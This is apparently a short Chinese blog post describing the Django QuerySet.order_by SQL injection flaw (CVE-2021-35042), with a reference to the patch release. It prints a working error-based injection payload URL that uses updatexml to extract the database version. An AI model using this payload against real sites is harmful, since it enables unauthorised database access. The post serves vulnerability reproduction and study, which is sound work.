当前位置: 首页 > news >正文

Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

news 2025/7/29 23:46:26

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

 

http://www.lryc.cn/news/241574.html

相关文章:

  • 鼠标拖拽问题,不选中文本不触发单击事件
  • Java 之 final 详解
  • 数据分析策略
  • 子虔科技亮相2023工业软件生态大会 以先进理念赋能工业软件发展
  • 《C++PrimePlus》第9章 内存模型和名称空间
  • FFmpeg常用命令讲解及实战二
  • Django之Cookie与Session,CBV加装饰器
  • 定时发朋友圈怎么发?
  • nodejs 将word转为pdf office-to-pdf
  • 12.docker的网络-host模式
  • 如何在外部数据库中存储空间化表时使用Mapinfo_mapcatalog
  • 从Github登录的双因子验证到基于时间戳的一次性密码:2FA、OTP与TOTP
  • ubuntu22.04安装wvp-gb28181-pro 2023-11-23最新版本(一键安装)
  • Spring Boot 应用的 Docker 化:从 Maven 构建到 Docker 部署的完整指南
  • linux之chmod命令
  • 论文阅读 Forecasting at Scale (一)
  • Unity PlayerPrefs相关应用
  • LeetCode题解:13. 罗马数字转整数,哈希表,JavaScript,详细注释
  • GPT2-chitchat项目运行
  • selinux-policy-default(2:2.20231119-2)软件包内容详细介绍(3)
  • Spring boot @Bean
  • ptpd2提示failed to join the multicast group (strerror: No buffer space available)
  • 工业级5G路由器:稳定性更高,网络速度更快!
  • 移动应用程序管理的内容、原因和方式
  • Revive开发商加入VR开源标准OpenXR
  • Lambda 重构面向对象的设计模式
  • element ui 上传组件实现手动上传
  • 怎样提升伦敦银买卖技巧?
  • MySQL的体系结构与SQL的执行流程
  • 数学建模之拟合及其代码